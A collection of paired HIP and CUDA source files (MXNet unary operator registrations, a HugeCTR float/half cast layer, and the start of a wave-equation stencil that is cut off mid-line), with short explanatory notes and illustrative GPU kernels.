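One detail of CusparseCsrmm2 that is easy to miss is the final cublasXgeam call: with alpha = 1 and beta = 0 it does nothing but rewrite the column-major m x n intermediate trans_out into the row-major m x n output expected by the rest of DGL. Under that reading of the arguments, a naive kernel doing the equivalent layout change would look like the hypothetical sketch below; the real code uses cuBLAS for performance.

// Hypothetical equivalent of the Xgeam step above: copy a column-major m x n
// matrix into a row-major m x n buffer (element (row, col) moves from
// col * m + row to row * n + col). Illustration only; cuBLAS is used instead.
__global__ void colmajor_to_rowmajor(const float* __restrict__ trans_out,  // column-major, m x n
                                     float* __restrict__ C_data,           // row-major, m x n
                                     int m, int n) {
  const int col = blockIdx.x * blockDim.x + threadIdx.x;  // 0 .. n-1
  const int row = blockIdx.y * blockDim.y + threadIdx.y;  // 0 .. m-1
  if (row < m && col < n) {
    C_data[row * n + col] = trans_out[col * m + row];
  }
}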
2bdb8a7fd7dcffb573e171665410004040e3b3b9.hip
// !!! This is a file automatically generated by hipify!!! /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file elemwise_unary_op_basic.cu * \brief GPU Implementation of unary functions. */ #include "./elemwise_binary_op.h" namespace mxnet { namespace op { NNVM_REGISTER_OP(relu) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::relu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::relu>); NNVM_REGISTER_OP(_backward_relu) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::relu_grad>>); NNVM_REGISTER_OP(sigmoid) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sigmoid>); NNVM_REGISTER_OP(_backward_sigmoid) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sigmoid_grad>>); NNVM_REGISTER_OP(hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidForward<gpu>); NNVM_REGISTER_OP(_backward_hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidBackward<gpu>); // softsign NNVM_REGISTER_OP(softsign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::softsign>); NNVM_REGISTER_OP(_backward_softsign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::softsign_grad>>); // erf NNVM_REGISTER_OP(erf) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erf>); NNVM_REGISTER_OP(_backward_erf) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erf_grad>>); // erfinv NNVM_REGISTER_OP(erfinv) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erfinv>); NNVM_REGISTER_OP(_backward_erfinv) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erfinv_grad>>); // copy NNVM_REGISTER_OP(_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_reshape) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(BlockGrad) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(make_loss) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); // identity output as first input, but attributes are constrainted to be like rhs NNVM_REGISTER_OP(_identity_with_attr_like_rhs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeFirstItemEx<gpu>); 
NNVM_REGISTER_OP(reshape_like) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); void ShapeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); hipMemcpyAsync(out_data.dptr_, in_data.shape_.data(), in_data.ndim() * sizeof(int64_t), hipMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(shape_array) .set_attr<FCompute>("FCompute<gpu>", ShapeComputeGPU); void SizeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; using namespace mxnet_op; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); const index_t size_var = in_data.Size(); hipMemcpyAsync(out_data.dptr_, &size_var, 1U * sizeof(int64_t), hipMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(size_array) .set_attr<FCompute>("FCompute<gpu>", SizeComputeGPU); NNVM_REGISTER_OP(Cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); NNVM_REGISTER_OP(_backward_cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); // negative NNVM_REGISTER_OP(negative) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::negation>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::negation>); // abs NNVM_REGISTER_OP(abs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::abs>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::abs>); NNVM_REGISTER_OP(_backward_abs) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::sign> >); // sign NNVM_REGISTER_OP(sign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sign>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::sign>); NNVM_REGISTER_OP(_backward_sign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sign_grad> >); // round NNVM_REGISTER_OP(round) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::round>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::round>); // ceil NNVM_REGISTER_OP(ceil) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::ceil>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::ceil>); // floor NNVM_REGISTER_OP(floor) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::floor>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::floor>); // trunc NNVM_REGISTER_OP(trunc) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::trunc>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::trunc>); // rint NNVM_REGISTER_OP(rint) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::rint>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::rint>); // fix NNVM_REGISTER_OP(fix) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::fix>) 
.set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::fix>); // gamma NNVM_REGISTER_OP(gamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gamma>); NNVM_REGISTER_OP(_backward_gamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gamma_grad> >); // gammaln NNVM_REGISTER_OP(gammaln) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gammaln>); NNVM_REGISTER_OP(_backward_gammaln) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gammaln_grad> >); // digamma NNVM_REGISTER_OP(digamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::digamma>); NNVM_REGISTER_OP(_backward_digamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::trigamma> >); // logical not NNVM_REGISTER_OP(logical_not) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::nt>); } // namespace op } // namespace mxnet
2bdb8a7fd7dcffb573e171665410004040e3b3b9.cu
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file elemwise_unary_op_basic.cu * \brief GPU Implementation of unary functions. */ #include "./elemwise_binary_op.h" namespace mxnet { namespace op { NNVM_REGISTER_OP(relu) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::relu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::relu>); NNVM_REGISTER_OP(_backward_relu) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::relu_grad>>); NNVM_REGISTER_OP(sigmoid) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sigmoid>); NNVM_REGISTER_OP(_backward_sigmoid) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sigmoid_grad>>); NNVM_REGISTER_OP(hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidForward<gpu>); NNVM_REGISTER_OP(_backward_hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidBackward<gpu>); // softsign NNVM_REGISTER_OP(softsign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::softsign>); NNVM_REGISTER_OP(_backward_softsign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::softsign_grad>>); // erf NNVM_REGISTER_OP(erf) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erf>); NNVM_REGISTER_OP(_backward_erf) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erf_grad>>); // erfinv NNVM_REGISTER_OP(erfinv) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erfinv>); NNVM_REGISTER_OP(_backward_erfinv) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erfinv_grad>>); // copy NNVM_REGISTER_OP(_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_reshape) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(BlockGrad) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(make_loss) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); // identity output as first input, but attributes are constrainted to be like rhs NNVM_REGISTER_OP(_identity_with_attr_like_rhs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeFirstItemEx<gpu>); NNVM_REGISTER_OP(reshape_like) 
.set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); void ShapeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); cudaMemcpyAsync(out_data.dptr_, in_data.shape_.data(), in_data.ndim() * sizeof(int64_t), cudaMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(shape_array) .set_attr<FCompute>("FCompute<gpu>", ShapeComputeGPU); void SizeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; using namespace mxnet_op; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); const index_t size_var = in_data.Size(); cudaMemcpyAsync(out_data.dptr_, &size_var, 1U * sizeof(int64_t), cudaMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(size_array) .set_attr<FCompute>("FCompute<gpu>", SizeComputeGPU); NNVM_REGISTER_OP(Cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); NNVM_REGISTER_OP(_backward_cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); // negative NNVM_REGISTER_OP(negative) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::negation>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::negation>); // abs NNVM_REGISTER_OP(abs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::abs>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::abs>); NNVM_REGISTER_OP(_backward_abs) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::sign> >); // sign NNVM_REGISTER_OP(sign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sign>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::sign>); NNVM_REGISTER_OP(_backward_sign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sign_grad> >); // round NNVM_REGISTER_OP(round) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::round>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::round>); // ceil NNVM_REGISTER_OP(ceil) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::ceil>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::ceil>); // floor NNVM_REGISTER_OP(floor) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::floor>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::floor>); // trunc NNVM_REGISTER_OP(trunc) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::trunc>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::trunc>); // rint NNVM_REGISTER_OP(rint) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::rint>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::rint>); // fix NNVM_REGISTER_OP(fix) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::fix>) 
.set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::fix>); // gamma NNVM_REGISTER_OP(gamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gamma>); NNVM_REGISTER_OP(_backward_gamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gamma_grad> >); // gammaln NNVM_REGISTER_OP(gammaln) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gammaln>); NNVM_REGISTER_OP(_backward_gammaln) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gammaln_grad> >); // digamma NNVM_REGISTER_OP(digamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::digamma>); NNVM_REGISTER_OP(_backward_digamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::trigamma> >); // logical not NNVM_REGISTER_OP(logical_not) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::nt>); } // namespace op } // namespace mxnet
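Each NNVM_REGISTER_OP line above attaches a GPU compute function; for the unary operators this is UnaryOp::Compute<gpu, OP>, which conceptually performs an elementwise map of OP over the input tensor. The sketch below shows that general pattern in isolation; it is an illustration only, not MXNet's actual kernel, and the names unary_map_kernel and relu_op are invented for the example.

#include <cstdio>
#include <cuda_runtime.h>

// Device functor standing in for mshadow_op::relu in the registrations above.
struct relu_op {
  __device__ float operator()(float x) const { return x > 0.f ? x : 0.f; }
};

// Grid-stride elementwise map: the general shape of work behind a unary FCompute<gpu>.
template <typename Op>
__global__ void unary_map_kernel(const float* in, float* out, int n, Op op) {
  for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n;
       i += blockDim.x * gridDim.x) {
    out[i] = op(in[i]);
  }
}

int main() {
  const int n = 1 << 20;
  float *in, *out;
  cudaMallocManaged(&in, n * sizeof(float));
  cudaMallocManaged(&out, n * sizeof(float));
  for (int i = 0; i < n; ++i) in[i] = (i % 2 ? 1.f : -1.f) * i;  // alternate signs
  unary_map_kernel<<<256, 256>>>(in, out, n, relu_op());
  cudaDeviceSynchronize();
  printf("out[3] = %f (expected 3), out[4] = %f (expected 0)\n", out[3], out[4]);
  cudaFree(in);
  cudaFree(out);
  return 0;
}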
456e960bec327b051125ff5bd0e9feaf3d3eeaf0.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * Copyright (c) 2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <hip/hip_fp16.h> #include <layers/cast_layer.hpp> #include "HugeCTR/include/utils.hpp" namespace HugeCTR { namespace { __global__ void cast_kernel(__half* out, const float* in, int size) { __half2* out2 = (__half2*)(out); float2* in2 = (float2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __float22half2_rn(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __float2half(__ldg(in + size - 1)); } } __global__ void cast_kernel(float* out, const __half* in, int size) { float2* out2 = (float2*)(out); __half2* in2 = (__half2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __half22float2(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __half2float(__ldg(in + size - 1)); } } } // namespace template <typename From, typename To> CastLayer<From, To>::CastLayer(const Tensor2<From>& bottom_tensor, const Tensor2<To>& top_tensor, const std::shared_ptr<GPUResource>& gpu_resource) : Layer(gpu_resource) { assert(bottom_tensor.get_num_elements() == top_tensor.get_num_elements()); bottom_tensor_ = bottom_tensor; top_tensor_ = top_tensor; } template <typename From, typename To> void CastLayer<From, To>::fprop(bool is_train) { CudaDeviceContext context(get_device_id()); const From* bottom = bottom_tensor_.get_ptr(); To* top = top_tensor_.get_ptr(); const size_t threads = 512; const size_t blocks = ::min((bottom_tensor_.get_num_elements() - 1) / threads + 1, 1024ul); hipLaunchKernelGGL(( cast_kernel), dim3(blocks), dim3(threads), 0, get_gpu().get_stream(), top, bottom, bottom_tensor_.get_num_elements()); #ifndef NDEBUG CK_CUDA_THROW_(hipDeviceSynchronize()); CK_CUDA_THROW_(hipGetLastError()); #endif } template <typename From, typename To> void CastLayer<From, To>::bprop() { CudaDeviceContext context(get_device_id()); #ifndef NDEBUG CK_CUDA_THROW_(hipDeviceSynchronize()); CK_CUDA_THROW_(hipGetLastError()); #endif } template class CastLayer<float, __half>; template class CastLayer<__half, float>; } // namespace HugeCTR
456e960bec327b051125ff5bd0e9feaf3d3eeaf0.cu
/* * Copyright (c) 2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cuda_fp16.h> #include <layers/cast_layer.hpp> #include "HugeCTR/include/utils.hpp" namespace HugeCTR { namespace { __global__ void cast_kernel(__half* out, const float* in, int size) { __half2* out2 = (__half2*)(out); float2* in2 = (float2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __float22half2_rn(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __float2half(__ldg(in + size - 1)); } } __global__ void cast_kernel(float* out, const __half* in, int size) { float2* out2 = (float2*)(out); __half2* in2 = (__half2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __half22float2(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __half2float(__ldg(in + size - 1)); } } } // namespace template <typename From, typename To> CastLayer<From, To>::CastLayer(const Tensor2<From>& bottom_tensor, const Tensor2<To>& top_tensor, const std::shared_ptr<GPUResource>& gpu_resource) : Layer(gpu_resource) { assert(bottom_tensor.get_num_elements() == top_tensor.get_num_elements()); bottom_tensor_ = bottom_tensor; top_tensor_ = top_tensor; } template <typename From, typename To> void CastLayer<From, To>::fprop(bool is_train) { CudaDeviceContext context(get_device_id()); const From* bottom = bottom_tensor_.get_ptr(); To* top = top_tensor_.get_ptr(); const size_t threads = 512; const size_t blocks = std::min((bottom_tensor_.get_num_elements() - 1) / threads + 1, 1024ul); cast_kernel<<<blocks, threads, 0, get_gpu().get_stream()>>>(top, bottom, bottom_tensor_.get_num_elements()); #ifndef NDEBUG CK_CUDA_THROW_(cudaDeviceSynchronize()); CK_CUDA_THROW_(cudaGetLastError()); #endif } template <typename From, typename To> void CastLayer<From, To>::bprop() { CudaDeviceContext context(get_device_id()); #ifndef NDEBUG CK_CUDA_THROW_(cudaDeviceSynchronize()); CK_CUDA_THROW_(cudaGetLastError()); #endif } template class CastLayer<float, __half>; template class CastLayer<__half, float>; } // namespace HugeCTR
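cast_kernel above converts two elements per iteration by reinterpreting the buffers as float2 and __half2, walks the data with a grid-stride loop, and lets the first thread convert a leftover odd element. The standalone sketch below reproduces that pattern outside HugeCTR, assuming only cuda_fp16.h; float_to_half and the launch configuration are illustrative choices, not taken from the library.

#include <cstdio>
#include <cuda_fp16.h>
#include <cuda_runtime.h>

// Same idea as HugeCTR's cast_kernel(float -> __half): process pairs via __half2,
// then let thread 0 fix up the odd tail element, if any.
__global__ void float_to_half(__half* out, const float* in, int size) {
  __half2* out2 = reinterpret_cast<__half2*>(out);
  const float2* in2 = reinterpret_cast<const float2*>(in);
  int size2 = size / 2;
  int start = blockIdx.x * blockDim.x + threadIdx.x;
  for (int i = start; i < size2; i += blockDim.x * gridDim.x) {
    out2[i] = __float22half2_rn(in2[i]);  // round-to-nearest on both lanes
  }
  if (start == 0 && size % 2 > 0) {
    out[size - 1] = __float2half(in[size - 1]);
  }
}

int main() {
  const int n = 1025;  // odd size exercises the tail path
  float* in;
  __half* out;
  cudaMallocManaged(&in, n * sizeof(float));
  cudaMallocManaged(&out, n * sizeof(__half));
  for (int i = 0; i < n; ++i) in[i] = 0.5f * i;
  float_to_half<<<4, 256>>>(out, in, n);
  cudaDeviceSynchronize();
  printf("out[n-1] = %f (expected %f)\n", __half2float(out[n - 1]), in[n - 1]);
  cudaFree(in);
  cudaFree(out);
  return 0;
}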
57b8f32a28778fba6aa863b0eb63b51474ae0c61.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #define Rho 0.5 #define Eta 0.0002 #define G 0.75 #define N 512 #define DECOMPOSITION_PER_ROW 51 // row decomposition, furthermore devide a row into multiple pieces, minimum is 1 #define ELEMENT_PER_THREAD (N - 2) / DECOMPOSITION_PER_ROW // one thread handles all the elements in a single piece #define NUM_THREADS ((N - 2) * (N - 2)) / ((N - 2) / DECOMPOSITION_PER_ROW) #define NUM_THREADS_EDGE 4 * DECOMPOSITION_PER_ROW #define NUM_BLOCKS (NUM_THREADS + 1024 - NUM_THREADS % 1024) / 1024 #define NUM_BLOCKS_EDGE (NUM_THREADS_EDGE + 1024 - NUM_THREADS_EDGE % 1024) / 1024 void iteration_sequential(float u[N * N], float u1[N * N], float u2[N * N]) { clock_t start, end; for (int i = 1; i <= N - 2; i++) { for (int j = 1; j <= N - 2; j++) { u[i * N + j] = Rho * (u1[(i - 1) * N + j] + u1[(i + 1) * N + j] + u1[i * N + (j - 1)] + u1[i * N + (j + 1)] - 4 * u1[i * N + j]); u[i * N + j] += 2 * u1[i * N + j] - (1 - Eta) * u2[i * N + j]; u[i * N + j] /= (1 + Eta); } } for (int i = 1; i <= N - 2; i++) { u[0 * N + i] = G * u[1 * N + i]; u[(N - 1) * N + i] = G * u[(N - 2) * N + i]; u[i * N + 0] = G * u[i * N + 1]; u[i * N + (N - 1)] = G * u[i * N + (N - 2)]; } u[0 * N + 0] = G * u[1 * N + 0]; u[(N - 1) * N + 0] = G * u[(N - 2) * N + 0]; u[0 * N + (N - 1)] = G * u[0 * N + (N - 2)]; u[(N - 1) * N + (N - 1)] = G * u[(N - 1) * N + (N - 2)]; for (int i = 0; i < N * N; i++) { u2[i] = u1[i]; u1[i] = u[i]; } /*for (int i = 0; i < N * N; i++) { printf("(%d,%d): ", i / N, i % N); printf("%.6f ", u[i]); if ((i + 1) % N == 0) printf("\n"); }*/ } __global__ void iteration_parallel_central(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < NUM_THREADS) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] // int x = (i * (N - 2) + j) / (N - 2) + 1; // int y = (i * (N - 